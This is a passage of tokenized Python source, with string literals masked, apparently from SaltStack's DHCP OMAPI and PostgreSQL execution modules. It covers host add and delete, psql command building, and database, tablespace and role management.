'<STR_LIT>' , <EOL> __opts__ . get ( '<STR_LIT>' , None ) ) <EOL> return omapi . Omapi ( server_ip , server_port , username = username , key = key ) <EOL> def add_host ( mac , name = None , ip = None , ddns = False , group = None , <EOL> supersede_host = False ) : <EOL> '''<STR_LIT>''' <EOL> statements = '<STR_LIT>' <EOL> o = _conn ( ) <EOL> msg = omapi . OmapiMessage . open ( b'<STR_LIT:host>' ) <EOL> msg . message . append ( ( '<STR_LIT>' , struct . pack ( '<STR_LIT>' , <NUM_LIT:1> ) ) ) <EOL> msg . message . append ( ( '<STR_LIT>' , struct . pack ( '<STR_LIT>' , <NUM_LIT:1> ) ) ) <EOL> msg . obj . append ( ( '<STR_LIT>' , omapi . pack_mac ( mac ) ) ) <EOL> msg . obj . append ( ( '<STR_LIT>' , struct . pack ( '<STR_LIT>' , <NUM_LIT:1> ) ) ) <EOL> if ip : <EOL> msg . obj . append ( ( '<STR_LIT>' , omapi . pack_ip ( ip ) ) ) <EOL> if name : <EOL> msg . obj . append ( ( '<STR_LIT:name>' , name ) ) <EOL> if group : <EOL> msg . obj . append ( ( '<STR_LIT>' , group ) ) <EOL> if supersede_host : <EOL> statements += '<STR_LIT>' . format ( name ) <EOL> if ddns and name : <EOL> statements += '<STR_LIT>' . format ( name ) <EOL> if statements : <EOL> msg . obj . 
append ( ( '<STR_LIT>' , statements ) ) <EOL> response = o . query_server ( msg ) <EOL> if response . opcode != omapi . OMAPI_OP_UPDATE : <EOL> return False <EOL> return True <EOL> def delete_host ( mac = None , name = None ) : <EOL> '''<STR_LIT>''' <EOL> if not ( mac or name ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> o = _conn ( ) <EOL> msg = omapi . OmapiMessage . open ( b'<STR_LIT:host>' ) <EOL> if mac : <EOL> msg . obj . append ( ( '<STR_LIT>' , omapi . pack_mac ( mac ) ) ) <EOL> msg . obj . append ( ( '<STR_LIT>' , struct . pack ( '<STR_LIT>' , <NUM_LIT:1> ) ) ) <EOL> if name : <EOL> msg . obj . append ( ( '<STR_LIT:name>' , name ) ) <EOL> response = o . query_server ( msg ) <EOL> if response . opcode != omapi . OMAPI_OP_UPDATE : <EOL> return None <EOL> if response . handle == <NUM_LIT:0> : <EOL> return False <EOL> response = o . query_server ( omapi . OmapiMessage . delete ( response . handle ) ) <EOL> if response . opcode != omapi . OMAPI_OP_STATUS : <EOL> return False <EOL> return True </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import datetime <EOL> import distutils . version <EOL> import logging <EOL> import hashlib <EOL> import os <EOL> import re <EOL> import pipes <EOL> import tempfile <EOL> try : <EOL> import csv <EOL> HAS_CSV = True <EOL> except ImportError : <EOL> HAS_CSV = False <EOL> import salt . utils <EOL> import salt . utils . itertools <EOL> from salt . exceptions import SaltInvocationError <EOL> import salt . ext . six as six <EOL> from salt . ext . six . moves import zip <EOL> from salt . ext . six . moves import StringIO <EOL> log = logging . getLogger ( __name__ ) <EOL> _DEFAULT_PASSWORDS_ENCRYPTION = True <EOL> _EXTENSION_NOT_INSTALLED = '<STR_LIT>' <EOL> _EXTENSION_INSTALLED = '<STR_LIT>' <EOL> _EXTENSION_TO_UPGRADE = '<STR_LIT>' <EOL> _EXTENSION_TO_MOVE = '<STR_LIT>' <EOL> _EXTENSION_FLAGS = ( <EOL> _EXTENSION_NOT_INSTALLED , <EOL> _EXTENSION_INSTALLED , <EOL> _EXTENSION_TO_UPGRADE , <EOL> _EXTENSION_TO_MOVE , <EOL> ) <EOL> _PRIVILEGES_MAP = { <EOL> '<STR_LIT:a>' : '<STR_LIT>' , <EOL> '<STR_LIT:C>' : '<STR_LIT>' , <EOL> '<STR_LIT:D>' : '<STR_LIT>' , <EOL> '<STR_LIT:c>' : '<STR_LIT>' , <EOL> '<STR_LIT:t>' : '<STR_LIT>' , <EOL> '<STR_LIT:r>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:T>' : '<STR_LIT>' , <EOL> '<STR_LIT:w>' : '<STR_LIT>' , <EOL> '<STR_LIT:X>' : '<STR_LIT>' , <EOL> '<STR_LIT:x>' : '<STR_LIT>' , <EOL> '<STR_LIT:d>' : '<STR_LIT>' , <EOL> '<STR_LIT:*>' : '<STR_LIT>' , <EOL> } <EOL> _PRIVILEGES_OBJECTS = frozenset ( <EOL> ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ) <EOL> _PRIVILEGE_TYPE_MAP = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:C>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' 
<EOL> if all ( ( salt . utils . which ( '<STR_LIT>' ) , HAS_CSV ) ) : <EOL> return True <EOL> return ( False , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _run_psql ( cmd , runas = None , password = None , host = None , port = None , user = None ) : <EOL> '''<STR_LIT>''' <EOL> kwargs = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> if runas is None : <EOL> if not host : <EOL> host = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> if not host or host . startswith ( '<STR_LIT:/>' ) : <EOL> if '<STR_LIT>' in __grains__ [ '<STR_LIT>' ] : <EOL> runas = '<STR_LIT>' <EOL> if '<STR_LIT>' in __grains__ [ '<STR_LIT>' ] : <EOL> runas = '<STR_LIT>' <EOL> else : <EOL> runas = '<STR_LIT>' <EOL> if user is None : <EOL> user = runas <EOL> if runas : <EOL> kwargs [ '<STR_LIT>' ] = runas <EOL> if password is None : <EOL> password = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> if password is not None : <EOL> pgpassfile = salt . utils . mkstemp ( text = True ) <EOL> with salt . utils . fopen ( pgpassfile , '<STR_LIT:w>' ) as fp_ : <EOL> fp_ . write ( '<STR_LIT>' . format ( <EOL> '<STR_LIT:localhost>' if not host or host . startswith ( '<STR_LIT:/>' ) else host , <EOL> port if port else '<STR_LIT:*>' , <EOL> user if user else '<STR_LIT:*>' , <EOL> password , <EOL> ) ) <EOL> __salt__ [ '<STR_LIT>' ] ( pgpassfile , runas , '<STR_LIT>' ) <EOL> kwargs [ '<STR_LIT>' ] = { '<STR_LIT>' : pgpassfile } <EOL> ret = __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False , ** kwargs ) <EOL> if ret . get ( '<STR_LIT>' , <NUM_LIT:0> ) != <NUM_LIT:0> : <EOL> log . error ( '<STR_LIT>' ) <EOL> if password is not None and not __salt__ [ '<STR_LIT>' ] ( pgpassfile ) : <EOL> log . 
warning ( '<STR_LIT>' ) <EOL> return ret <EOL> def _run_initdb ( name , <EOL> auth = '<STR_LIT:password>' , <EOL> user = None , <EOL> password = None , <EOL> encoding = '<STR_LIT>' , <EOL> locale = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if runas is None : <EOL> if '<STR_LIT>' in __grains__ [ '<STR_LIT>' ] : <EOL> runas = '<STR_LIT>' <EOL> if '<STR_LIT>' in __grains__ [ '<STR_LIT>' ] : <EOL> runas = '<STR_LIT>' <EOL> else : <EOL> runas = '<STR_LIT>' <EOL> if user is None : <EOL> user = runas <EOL> cmd = [ <EOL> salt . utils . which ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' . format ( name ) , <EOL> '<STR_LIT>' . format ( user ) , <EOL> '<STR_LIT>' . format ( auth ) , <EOL> '<STR_LIT>' . format ( encoding ) , <EOL> ] <EOL> if locale is not None : <EOL> cmd . append ( '<STR_LIT>' . format ( locale ) ) <EOL> if password is not None : <EOL> pgpassfile = salt . utils . mkstemp ( text = True ) <EOL> with salt . utils . fopen ( pgpassfile , '<STR_LIT:w>' ) as fp_ : <EOL> fp_ . write ( '<STR_LIT>' . format ( password ) ) <EOL> __salt__ [ '<STR_LIT>' ] ( pgpassfile , runas , '<STR_LIT>' ) <EOL> cmd . extend ( [ <EOL> '<STR_LIT>' . format ( pgpassfile ) , <EOL> ] ) <EOL> kwargs = dict ( runas = runas , clean_env = True ) <EOL> cmdstr = '<STR_LIT:U+0020>' . join ( [ pipes . quote ( c ) for c in cmd ] ) <EOL> ret = __salt__ [ '<STR_LIT>' ] ( cmdstr , python_shell = False , ** kwargs ) <EOL> if ret . get ( '<STR_LIT>' , <NUM_LIT:0> ) != <NUM_LIT:0> : <EOL> log . error ( '<STR_LIT>' ) <EOL> if password is not None and not __salt__ [ '<STR_LIT>' ] ( pgpassfile ) : <EOL> log . 
warning ( '<STR_LIT>' ) <EOL> return ret <EOL> def version ( user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> query = '<STR_LIT>' '<STR_LIT>' <EOL> cmd = _psql_cmd ( '<STR_LIT:-c>' , query , <EOL> '<STR_LIT>' , <EOL> host = host , <EOL> user = user , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> ret = _run_psql ( <EOL> cmd , runas = runas , password = password , host = host , port = port , user = user ) <EOL> for line in salt . utils . itertools . split ( ret [ '<STR_LIT>' ] , '<STR_LIT:\n>' ) : <EOL> return line <EOL> def _parsed_version ( user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> psql_version = version ( <EOL> user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas , <EOL> ) <EOL> if psql_version : <EOL> return distutils . version . LooseVersion ( psql_version ) <EOL> else : <EOL> log . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return None <EOL> def _connection_defaults ( user = None , host = None , port = None , maintenance_db = None , <EOL> password = None ) : <EOL> '''<STR_LIT>''' <EOL> if not user : <EOL> user = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> if not host : <EOL> host = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> if not port : <EOL> port = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> if not maintenance_db : <EOL> maintenance_db = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> if password is None : <EOL> password = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> return ( user , host , port , maintenance_db , password ) <EOL> def _psql_cmd ( * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> ( user , host , port , maintenance_db , password ) = _connection_defaults ( <EOL> kwargs . get ( '<STR_LIT:user>' ) , <EOL> kwargs . 
get ( '<STR_LIT:host>' ) , <EOL> kwargs . get ( '<STR_LIT:port>' ) , <EOL> kwargs . get ( '<STR_LIT>' ) , <EOL> kwargs . get ( '<STR_LIT:password>' ) ) <EOL> cmd = [ salt . utils . which ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> if user : <EOL> cmd += [ '<STR_LIT>' , user ] <EOL> if host : <EOL> cmd += [ '<STR_LIT>' , host ] <EOL> if port : <EOL> cmd += [ '<STR_LIT>' , str ( port ) ] <EOL> if not maintenance_db : <EOL> maintenance_db = '<STR_LIT>' <EOL> cmd . extend ( [ '<STR_LIT>' , maintenance_db ] ) <EOL> cmd . extend ( args ) <EOL> return cmd <EOL> def _psql_prepare_and_run ( cmd , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None , <EOL> user = None ) : <EOL> rcmd = _psql_cmd ( <EOL> host = host , user = user , port = port , <EOL> maintenance_db = maintenance_db , password = password , <EOL> * cmd ) <EOL> cmdret = _run_psql ( <EOL> rcmd , runas = runas , password = password , host = host , port = port , user = user ) <EOL> return cmdret <EOL> def psql_query ( query , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = [ ] <EOL> csv_query = '<STR_LIT>' . format ( <EOL> query . strip ( ) . rstrip ( '<STR_LIT:;>' ) ) <EOL> cmdret = _psql_prepare_and_run ( [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:-c>' , csv_query ] , <EOL> runas = runas , <EOL> host = host , user = user , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> if cmdret [ '<STR_LIT>' ] > <NUM_LIT:0> : <EOL> return ret <EOL> csv_file = StringIO ( cmdret [ '<STR_LIT>' ] ) <EOL> header = { } <EOL> for row in csv . reader ( csv_file , delimiter = '<STR_LIT:U+002C>' , quotechar = '<STR_LIT:">' ) : <EOL> if not row : <EOL> continue <EOL> if not header : <EOL> header = row <EOL> continue <EOL> ret . 
append ( dict ( zip ( header , row ) ) ) <EOL> return ret <EOL> def db_list ( user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> query = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> rows = psql_query ( query , runas = runas , host = host , user = user , <EOL> port = port , maintenance_db = maintenance_db , <EOL> password = password ) <EOL> for row in rows : <EOL> ret [ row [ '<STR_LIT:Name>' ] ] = row <EOL> ret [ row [ '<STR_LIT:Name>' ] ] . pop ( '<STR_LIT:Name>' ) <EOL> return ret <EOL> def db_exists ( name , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> databases = db_list ( user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> return name in databases <EOL> def db_create ( name , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> tablespace = None , <EOL> encoding = None , <EOL> lc_collate = None , <EOL> lc_ctype = None , <EOL> owner = None , <EOL> template = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> query = '<STR_LIT>' . format ( name ) <EOL> with_args = salt . utils . odict . OrderedDict ( { <EOL> '<STR_LIT>' : owner and '<STR_LIT>' . format ( owner ) , <EOL> '<STR_LIT>' : template , <EOL> '<STR_LIT>' : encoding and '<STR_LIT>' . format ( encoding ) , <EOL> '<STR_LIT>' : lc_collate and '<STR_LIT>' . format ( lc_collate ) , <EOL> '<STR_LIT>' : lc_ctype and '<STR_LIT>' . format ( lc_ctype ) , <EOL> '<STR_LIT>' : tablespace , <EOL> } ) <EOL> with_chunks = [ ] <EOL> for key , value in with_args . items ( ) : <EOL> if value is not None : <EOL> with_chunks += [ key , '<STR_LIT:=>' , value ] <EOL> if with_chunks : <EOL> with_chunks . 
insert ( <NUM_LIT:0> , '<STR_LIT>' ) <EOL> query += '<STR_LIT:U+0020>' . join ( with_chunks ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def db_alter ( name , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , tablespace = None , owner = None , owner_recurse = False , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if not any ( ( tablespace , owner ) ) : <EOL> return True <EOL> if owner and owner_recurse : <EOL> ret = owner_to ( name , owner , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> password = password , <EOL> runas = runas ) <EOL> else : <EOL> queries = [ ] <EOL> if owner : <EOL> queries . append ( '<STR_LIT>' . format ( <EOL> name , owner <EOL> ) ) <EOL> if tablespace : <EOL> queries . append ( '<STR_LIT>' . format ( <EOL> name , tablespace <EOL> ) ) <EOL> for query in queries : <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> if ret [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> return False <EOL> return True <EOL> def db_remove ( name , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> query = '<STR_LIT>' . 
format ( name ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> runas = runas , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def tablespace_list ( user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> query = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> rows = __salt__ [ '<STR_LIT>' ] ( query , runas = runas , host = host , <EOL> user = user , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> for row in rows : <EOL> ret [ row [ '<STR_LIT:Name>' ] ] = row <EOL> ret [ row [ '<STR_LIT:Name>' ] ] . pop ( '<STR_LIT:Name>' ) <EOL> return ret <EOL> def tablespace_exists ( name , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> tablespaces = tablespace_list ( user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> return name in tablespaces <EOL> def tablespace_create ( name , location , options = None , owner = None , user = None , <EOL> host = None , port = None , maintenance_db = None , password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> owner_query = '<STR_LIT>' <EOL> options_query = '<STR_LIT>' <EOL> if owner : <EOL> owner_query = '<STR_LIT>' . format ( owner ) <EOL> if options : <EOL> optionstext = [ '<STR_LIT>' . format ( k , v ) for k , v in options . items ( ) ] <EOL> options_query = '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( optionstext ) ) <EOL> query = '<STR_LIT>' . 
format ( name , <EOL> owner_query , <EOL> location , <EOL> options_query ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def tablespace_alter ( name , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , new_name = None , new_owner = None , <EOL> set_option = None , reset_option = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if not any ( [ new_name , new_owner , set_option , reset_option ] ) : <EOL> return True <EOL> queries = [ ] <EOL> if new_name : <EOL> queries . append ( '<STR_LIT>' . format ( <EOL> name , new_name ) ) <EOL> if new_owner : <EOL> queries . append ( '<STR_LIT>' . format ( <EOL> name , new_owner ) ) <EOL> if set_option : <EOL> queries . append ( '<STR_LIT>' . format ( <EOL> name , set_option . keys ( ) [ <NUM_LIT:0> ] , set_option . values ( ) [ <NUM_LIT:0> ] ) ) <EOL> if reset_option : <EOL> queries . append ( '<STR_LIT>' . format ( <EOL> name , reset_option ) ) <EOL> for query in queries : <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> if ret [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> return False <EOL> return True <EOL> def tablespace_remove ( name , user = None , host = None , port = None , <EOL> maintenance_db = None , password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> query = '<STR_LIT>' . 
format ( name ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> runas = runas , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def user_list ( user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None , return_password = False ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> ver = _parsed_version ( user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> if ver : <EOL> if ver >= distutils . version . LooseVersion ( '<STR_LIT>' ) : <EOL> replication_column = '<STR_LIT>' <EOL> else : <EOL> replication_column = '<STR_LIT>' <EOL> if ver >= distutils . version . LooseVersion ( '<STR_LIT>' ) : <EOL> rolcatupdate_column = '<STR_LIT>' <EOL> else : <EOL> rolcatupdate_column = '<STR_LIT>' <EOL> else : <EOL> log . error ( '<STR_LIT>' ) <EOL> return False <EOL> _x = lambda s : s if return_password else '<STR_LIT>' <EOL> query = ( '<STR_LIT>' . join ( [ <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> , _x ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' <EOL> , _x ( '<STR_LIT>' ) <EOL> , _x ( '<STR_LIT>' ) <EOL> ] ) . 
format ( rolcatupdate_column , replication_column ) ) <EOL> rows = psql_query ( query , <EOL> runas = runas , <EOL> host = host , <EOL> user = user , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> def get_bool ( rowdict , key ) : <EOL> '''<STR_LIT>''' <EOL> if rowdict [ key ] == '<STR_LIT:t>' : <EOL> return True <EOL> elif rowdict [ key ] == '<STR_LIT:f>' : <EOL> return False <EOL> else : <EOL> return None <EOL> for row in rows : <EOL> retrow = { } <EOL> for key in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> retrow [ key ] = get_bool ( row , key ) <EOL> for date_key in ( '<STR_LIT>' , ) : <EOL> try : <EOL> retrow [ date_key ] = datetime . datetime . strptime ( <EOL> row [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> except ( ValueError , KeyError ) : <EOL> retrow [ date_key ] = None <EOL> retrow [ '<STR_LIT>' ] = row [ '<STR_LIT>' ] <EOL> if return_password : <EOL> retrow [ '<STR_LIT:password>' ] = row [ '<STR_LIT:password>' ] <EOL> ret [ row [ '<STR_LIT:name>' ] ] = retrow <EOL> for role in six . iterkeys ( ret ) : <EOL> rdata = ret [ role ] <EOL> groups = rdata . setdefault ( '<STR_LIT>' , [ ] ) <EOL> query = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) . format ( role ) <EOL> try : <EOL> rows = psql_query ( query , <EOL> runas = runas , <EOL> host = host , <EOL> user = user , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> for row in rows : <EOL> if row [ '<STR_LIT>' ] not in groups : <EOL> groups . 
append ( row [ '<STR_LIT>' ] ) <EOL> except Exception : <EOL> continue <EOL> return ret <EOL> def role_get ( name , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None , return_password = False ) : <EOL> '''<STR_LIT>''' <EOL> all_users = user_list ( user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas , <EOL> return_password = return_password ) <EOL> try : <EOL> return all_users . get ( name , None ) <EOL> except AttributeError : <EOL> log . error ( '<STR_LIT>' ) <EOL> return None <EOL> def user_exists ( name , <EOL> user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return bool ( <EOL> role_get ( name , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas , <EOL> return_password = False ) ) <EOL> def _add_role_flag ( string , <EOL> test , <EOL> flag , <EOL> cond = None , <EOL> prefix = '<STR_LIT>' , <EOL> addtxt = '<STR_LIT>' , <EOL> skip = False ) : <EOL> if not skip : <EOL> if cond is None : <EOL> cond = test <EOL> if test is not None : <EOL> if cond : <EOL> string = '<STR_LIT>' . format ( string , flag ) <EOL> else : <EOL> string = '<STR_LIT>' . format ( string , flag , prefix ) <EOL> if addtxt : <EOL> string = '<STR_LIT>' . format ( string , addtxt ) <EOL> return string <EOL> def _maybe_encrypt_password ( role , <EOL> password , <EOL> encrypted = _DEFAULT_PASSWORDS_ENCRYPTION ) : <EOL> '''<STR_LIT>''' <EOL> if password is not None : <EOL> password = str ( password ) <EOL> if encrypted and password and not password . startswith ( '<STR_LIT>' ) : <EOL> password = "<STR_LIT>" . format ( <EOL> hashlib . md5 ( salt . utils . to_bytes ( '<STR_LIT>' . format ( password , role ) ) ) . 
hexdigest ( ) ) <EOL> return password <EOL> def _role_cmd_args ( name , <EOL> sub_cmd = '<STR_LIT>' , <EOL> typ_ = '<STR_LIT>' , <EOL> encrypted = None , <EOL> login = None , <EOL> connlimit = None , <EOL> inherit = None , <EOL> createdb = None , <EOL> createuser = None , <EOL> createroles = None , <EOL> superuser = None , <EOL> groups = None , <EOL> replication = None , <EOL> rolepassword = None , <EOL> db_role = None ) : <EOL> if createuser is not None and superuser is None : <EOL> superuser = createuser <EOL> if inherit is None : <EOL> if typ_ in [ '<STR_LIT:user>' , '<STR_LIT>' ] : <EOL> inherit = True <EOL> if login is None : <EOL> if typ_ == '<STR_LIT:user>' : <EOL> login = True <EOL> if typ_ == '<STR_LIT>' : <EOL> login = False <EOL> if encrypted is None : <EOL> encrypted = _DEFAULT_PASSWORDS_ENCRYPTION <EOL> skip_passwd = False <EOL> escaped_password = '<STR_LIT>' <EOL> if not ( <EOL> rolepassword is not None <EOL> and ( <EOL> isinstance ( rolepassword , six . string_types ) and bool ( rolepassword ) <EOL> ) <EOL> or ( <EOL> isinstance ( rolepassword , bool ) <EOL> ) <EOL> ) : <EOL> skip_passwd = True <EOL> if isinstance ( rolepassword , six . string_types ) and bool ( rolepassword ) : <EOL> escaped_password = '<STR_LIT>' . format ( <EOL> _maybe_encrypt_password ( name , <EOL> rolepassword . 
replace ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> encrypted = encrypted ) ) <EOL> skip_superuser = False <EOL> if bool ( db_role ) and bool ( superuser ) == bool ( db_role [ '<STR_LIT>' ] ) : <EOL> skip_superuser = True <EOL> flags = ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:test>' : inherit } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:test>' : createdb } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:test>' : createroles } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:test>' : superuser , <EOL> '<STR_LIT>' : skip_superuser } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:test>' : replication } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:test>' : login } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:test>' : bool ( connlimit ) , <EOL> '<STR_LIT>' : str ( connlimit ) , <EOL> '<STR_LIT>' : connlimit is None } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:test>' : ( encrypted is not None and bool ( rolepassword ) ) , <EOL> '<STR_LIT>' : skip_passwd or isinstance ( rolepassword , bool ) , <EOL> '<STR_LIT>' : encrypted , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:test>' : bool ( rolepassword ) , <EOL> '<STR_LIT>' : skip_passwd , <EOL> '<STR_LIT>' : escaped_password } , <EOL> ) <EOL> for data in flags : <EOL> sub_cmd = _add_role_flag ( sub_cmd , ** data ) <EOL> if sub_cmd . endswith ( '<STR_LIT>' ) : <EOL> sub_cmd = sub_cmd . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if groups : <EOL> if isinstance ( groups , list ) : <EOL> groups = '<STR_LIT:U+002C>' . join ( groups ) <EOL> for group in groups . split ( '<STR_LIT:U+002C>' ) : <EOL> sub_cmd = '<STR_LIT>' . 
